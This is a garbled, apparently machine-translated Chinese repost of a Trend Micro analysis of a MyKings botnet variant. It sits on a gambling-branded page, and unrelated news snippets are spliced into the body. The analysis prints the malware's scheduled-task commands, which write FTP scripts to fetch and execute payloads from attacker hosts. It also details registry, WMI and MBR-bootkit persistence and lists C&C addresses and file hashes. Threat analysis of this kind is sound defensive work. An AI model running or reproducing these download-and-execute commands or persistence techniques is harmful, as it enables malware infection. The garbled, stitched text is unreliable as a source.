理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

申博_新闻事件 申博 61次浏览 已收录 0个评论

Magecart第五小组开始使用KPOT展开窃密运动

1 概述 2019年8月,安天CERT监测到了多起利用KPOT木马进行窃密的事件。安天CERT判定这些窃密事件是由Magecart第五小组发起的,攻击者利用KPOT窃取用户加密货币钱包信息、应用账户信息以及浏览器cookies等多种信息。攻击者主要利用了垃圾邮件以及RIG和Fallout漏洞利用工具包来传播木马。 Magecart是一个以获取经济利益为主要目的的窃取支付信息的组织集合,根据公开情报描述,Mag

概述

5月,在亚太地区一家科技公司的可治理的检测与响应(Managed Detection and Response,MDR)效劳中,我们发明了与永久之蓝(EternalBlue)相干的可疑运动,发明了一个经常被用于举行WannaCry进击的破绽应用东西。在发明以后,我们向该公司发出了关于潜伏要挟的警报。

几天以后,我们从该公司的一台主机上发明了与下述URL通讯的流量,终究确认为歹意URL:

· hxxp://js[.]mykings.top:280/v[.]sct

· hxxp://js[.]mykings.top:280/helloworld[.]msi

URL中,包含症结词“mykings”,类似于我们在2017年8月对僵尸收集举行剖析时所运用的敕令和控制(C&C)效劳器。如许一来,我们就有了一些可以进一步定位要挟的线索。

另外,依据对主机上体系注册表的修正,我们发明存在一些耐久性机制。下面这些注册表项将担任前面所提到的URL的C&C回调:

· HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” -Name “start”

· HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” -Name “start1”

· HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg” -Name “start”

· HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg” -Name “start1”

经由深切发掘后,我们发明这些条目是在2017年增添的,表明这些歹意软件变种在我们发明之前,已在公司的体系中隐蔽了约莫2年的时候。而正因如此,我们面对了更大的应战,因为时候关于肯定MyKings的现实Payload来讲异常症结。大批的僵尸收集组件,包含对C&C效劳器和下载URL的援用都只能在短时候内接见,异常不稳定。与平常情况下以嵌入式URL和嵌入式文件为主的感染体式格局差别,MyKings经由历程剧本绑缚在一起,从长途效劳器下载所需的一些内容。

在2017年增添的注册表项:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

在举行观察取证时期,我们还确认了与此前研讨一致的其他几种耐久性机制。除了自动运转注册表以外,我们还视察了设计使命和Windows Management Instrumentation(WMI)对象,细致信息以下。

使命设计和响应的启动字符串:

(1)使命称号:Mysa

启动字符串:cmd
/c echo open down[.]mysking[.]info>s&echo test>>s&echo
1433>>s&echo binary>>s&echo get
a.exe>>s&echo bye>>s&ftp -s:s&a.exe”}

(2)使命称号:Mysa1

启动字符串:rundll32.exe c:\\windows\\debug\\item.dat

(3)使命称号:Mysa2

启动字符串:cmd
/c echo open ftp[.]ftp0118[.]info>p&echo test>>p&echo
1433>>p&echo get s.dat
c:\\windows\\debug\\item.dat>>p&echo bye>>p&ftp
-s:p”}

(4)使命称号:Mysa3

启动字符串:cmd /c echo open
ftp[.]ftp0118[.]info>ps&echo test>>ps&echo
1433>>ps&echo get s.rar
c:\\windows\\help\\lsmosee.exe>>ps&echo bye>>ps&ftp
-s:ps&c:\\windows\\help\\lsmosee.exe”}

(5)使命称号:ok

启动字符串:rundll32.exe c:\\windows\\debug\\ok.dat

WMI对象及细致信息:

(1)WMI对象:__EventConsumer

称号:fuckyoumm2_consumer

EventConsumer代码截图:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

(2)WMI对象:__EventFilter

称号:fuckyoumm2_filter

查询:select * from __timerevent where timerid=”fuckyoumm2_itimer”

(3)WMI对象:__FilterToConsumerBinding

申明:__FilterToConsumerBinding.Consumer=”\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=

\”fuckyoumm2_consumer\””,Filter=”\\\\.\\root\\subscription:__EventFilter.Name=\”fuckyoumm2_filter\””

经由剖析,我们发明该变种保留了其基础的基础设施,但有一些值得关注的新增功用,我们将在背面的手艺剖析章节细致议论。

确认进击的上下文环境

现在,跟着僵尸收集的敏捷散布,它已逐步成为最严峻的收集平安问题之一。停止2018年终,仅MyKings就已感染了凌驾500000台主机,并猎取了代价230万美元的加密钱银。在接下来的几个月中,MyKings不停转变其进击目标和感染体式格局。

依据我们在2017年的地区数据显现,昔时大部分感染运动都发作在亚太地区。依据进击时候表明,该歹意软件多是2017年某个歹意运动中的组成部分。

要排查该歹意运动,我们面对的主要应战之一就是将一切看似“风马牛不相干”的目标拼集在一起,以便更清楚地相识进击的全貌。因为感染发作在2017年,这意味着歹意软件有充足的时候来实行其例程,并供应种种Payload,这使事变变得越发庞杂。

假如是不具有MyKings相干履历或学问的研讨职员,在检察收集传感器时,很可能会疑心目标受到了来自差别要挟行动者的多种歹意软件范例的进击。从下图中可以看出,该进击运用了差别范例的歹意软件,比方后门、加密钱银发掘东西和木马。

Trend Micro Deep Discovery装备仪表盘上展示的进击:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

另外,MyKings存在多种耐久性机制,因而很难从受感染的计算机中移除。我们将在下一节中细致论述。

手艺剖析

(1) 运用bootkit举行耐久化

当我们在2017年初次观察MyKings时,我们关注的是投放加密钱银发掘东西的僵尸收集歹意软件是怎样应用WMI来完成耐久性的。类似于Mirai,MyKings好像不停转变其感染顺序。我们在此次应急中剖析的变种不单单议具有一种坚持耐久性的要领,而是具有多种。除了WMI以外,它好像还运用了注册表、使命设计和bootkit,个中最值得关注的是bootkit,Trend
Micro将其检测为Trojan.Win32.FUGRAFA.AB。

Bootkit一般运用文件名lsmosee.exe或s.rar。依据本年的报告,该代码也在ok.exe可实行文件中发明,但我们没法考证这一点,因为在我们举行观察时,响应的URL已没法接见。它将起首猎取硬盘的句柄,并搜检一般会包含MBR的第一个扇区,然后搜检其代码是不是已写入磁盘中。

bootkit对MBR举行搜检:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

接下来,将会搜检MBR中是不是已感染了其他bootkit,并会尝试在继承修正之前重置MBR。随后,bootkit将原始MBR复制到第二个扇区,运用本身的指导代码掩盖现有的MBR,然后继承在磁盘上写入其他的代码,确保在指导时可以运转。

(2) 内核形式例程

Bootkit将起首读取位于第三个扇区的代码,并将其加载到更高的地点,在此示例中为0x8f000。歹意代码统共散布在60个扇区当中。

代码散布在60个扇区当中:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

启动代码的主要目标是增添耐久性和举行自我庇护。它还经由历程异步历程挪用(APC)注入将歹意软件代码写入用户域历程中。为此,它起首会在中缀形貌符表(以下图所示)中变动INT 15的地点,以便在挪用INT 15时将实行重定向到0x8F00:0x0247。

在中缀形貌符表中变动INT 15的地点:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

在此例程以后,在启动体系之前运转位于第二扇区中的原始MBR。

一旦挪用INT15(最有可能在体系指导的历程当中发作),歹意软件的指导代码将经由历程变动其他几个内核级函数来进一步完成。终究,它将实行APC注入,并将完毕下面列出的一切反病毒历程。

指导加载顺序完毕的历程列表:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

直击云栖大会|阿里云平安肖力:云原生平安修建下一代企业平安架构

“数字经济的发展驱动越来越多的企业上云,每个企业都会基于云原生安全能力构筑下一代企业安全架构,完成从扁平到立体式架构的进化,届时云原生安全技术红利也将加速释放!”9月27日,阿里云智能安全事业部总经理肖力在2019杭州云栖大会·云安全峰会上指出。 肖力强调,云原生安全技术会默认植入在下一代企业安全架构的每个模块,从而升级整体安全水位。 阿里云

依据差别的Windows版本,代码将注入到差别的位置,个中包含winlogon、文件资本治理器或svchost。

注入到explorer.exe中的代码:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

假如注入到上面的历程失利,则会注入到svchost.exe当中。

(3) 用户形式例程(winlogon.exe/explorer.exe/svchost.exe)

注入到用户域代码的主要作用是从歹意C&C效劳器下载一段代码,C&C地点将从hxxp[://]www[.]upme0611[.]info/address[.]txt位置取得。address.txt的内容随时候而变化。在我们的测试历程时期,它主要包含以下内容:

[main]
count=6
ip1=http[://]208.110.71.194
ip2=http[://]80.85.152.247
ip3=http[://]66.117.2.182
ip4=http[://]70.39.124.70
ip5=http[://]150.107.76.227
ip6=http[://]103.213.246.23
[update]
count=6
ip1=http[://]208.110.71.194
ip2=http[://]80.85.152.247
ip3=http[://]66.117.2.182
ip4=http[://]70.39.124.70
ip5=http[://]150.107.76.227
ip6=http[://]103.213.246.23

在竖立与C&C效劳器的衔接以后,从上述的某一个效劳器下载TestMsg.tmp,这是由注入的历程实行的Shellcode。个中援用了cloud.txt,并包含以下文本,每次都有所差别:

[config]
url=about:blank
exe=http[://]185.22.172.13/upsupx.exe

文件upsupx.exe被下载并存储到主机上,随后在C:\Windows\Temp\中以conhost.exe实行。

(4) 主要下载东西(upsupx.exe/conhost.exe)

歹意软件变种为猎取C&C效劳器地点并下载其他Payload而发出的HTTP要求以下所示:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

该历程当中,会建立C:\Program Files\Common Files\xpdown.dat文件,个中包含C&C效劳器列表。最初的列表以下:

· ok[.]xmr6b[.]ru

· 74[.]222[.]14[.]61

· 45[.]58[.]135[.]106

· 103[.]95[.]28[.]54

· 103[.]213[.]246[.]23

随后,它挑选个中一个效劳器来下载更新的xpdown.dat。我们剖析发明,它从效劳器45[.]58[.]135[.]106下载,个中列出了以下内容:

· Ok[.]xmr6b[.]ru

· 61

· 74[.]222[.]14[.]61

· 139[.]5[.]177[.]10

· 45[.]58[.]135[.]106

一旦选定效劳器后,就会将HTTP要求发送到{server}/ok/down[.]html、{server}/ok/64[.]html和{server}/ok/vers[.]html,以下所示。

发送到其他效劳器的HTTP要求:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

我们运用32位主机举行测试,发明歹意软件继承从45[.]58[.]135[.]106举行下载。然则,下载效劳器可能会依据受感染的计算机是32位照样64位而有所差别。

随后,将会下载kill.txt,在终究从downs.txt猎取要下载并实行的文件列表前将搜检是不是存在该列表中的历程,并完毕婚配的历程。

下载downs.txt:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

我们对这些下载的文件举行了深切剖析,发明其作用是在体系重启时反复感染周期。假如我们移撤除可见的耐久性机制,并不会完整消弭感染。Msief.exe是一个自解压的压缩包,个中包含一个名为c3.bat的批处理文件,该文件担任建立一切设计使命、WMI和注册表自动启动项。

怎样运用可治理的检测与响应(MDR)发明MyKings僵尸收集

在现实场景中,Trend
Micro的可治理的检测与响应(Managed Detection and
Response)成为了一个症结的体系。MDR供应了观察事宜、剖析要挟的才能,而且更主要的是,可以将看似无关的目标关联起来,构成一个连接的团体,有助于绘制出进击的全貌。

特别是在如许的案例中,我们可以看到该体系的上风地点,在感染后的两年中都没有被发明。依托我们的东西,再加之研讨职员关于MyKings的相识,使我们可以疾速辨认出存在的要挟,并敏捷为受影响的企业供应弥补战略。

假如具有具有雄厚履历且善于运用庞杂平安东西的专业平安职员,可能会更快、更高效地辨认感染链,并关联URL检测、破绽应用、自动启动机制和歹意文件。下图申明了怎样经由历程运用平安东西,用一些简约的图表来形貌出像MyKings如许庞杂的僵尸收集。

Bootkit装置链展示出对DR0(MBR)的接见:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

重新启动后的感染链,个中可以清楚看到WMIC.exe、schtasks.exe和reg.exe等耐久性机制:

理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析

除了控制内部和外部要挟谍报资本以外,Trend Micro MDR团队还具有运用Trend Micro高等平安解决方案的履历,包含深度要挟发明体系,可以检测要挟在构造中的横向挪动。

要挟目标

文件名:b2.exe / msief.exe

SHA-256:e8ddefd237646a47debc01df9aa02fbcae40686f96b7860511c73798c7546201

检测称号:Backdoor.Win32.MIRAI.THGBIAI

文件名:s / p

SHA-256:7a4f2f2702fababb0619556e67a41d0a09e01fbfdb84d47b4463decdbb360980

检测称号:BAT_DLOAD.SMJ

文件名:ps   

SHA-256:d5f907f9d2001ee5013c4c1af965467714bbc0928112e54ba35d142c8eab68bf 

检测称号:BAT_DLOAD.SMJ

文件名:upsupx.exe   

SHA-256:790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd

检测称号:Coinminer.Win32.MALXMR.TIAOODBF

文件名:item.rar / item.dat

SHA-256:80f8ba7992a5dbaa4a2f76263258d5d7bf3bb8994f9e8a4a5294f70ab8e38ea4 

检测称号:Coinminer.Win32.WMINE.AA

文件名:ps   

SHA-256:ab26a859633d1ec68e021226fab47870ed78fc2e6a58c70a7a7060be51247c1d       

检测称号:Trojan.SH.BOTGET.AA

文件名:s.rar

SHA-256:a3bb132ab1ba3e706b90d6fb514504105f174c4e444e87be7bce1995f798044d       

检测称号:Trojan.Win32.FUGRAFA.AB

文件名:item.dat 

SHA-256:79bcb0b7ba00c4c65bf9b41cfe193fd917d92ab1d41456ac775836cec5cadc9a 

检测称号:Trojan.Win32.SYMMI.AA

本文翻译自:https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-a-mykings-variant-with-bootloader-persistence-via-managed-detection-and-response/


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明理会僵尸收集运用的多种耐久化要领:MyKings新变种剖析
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址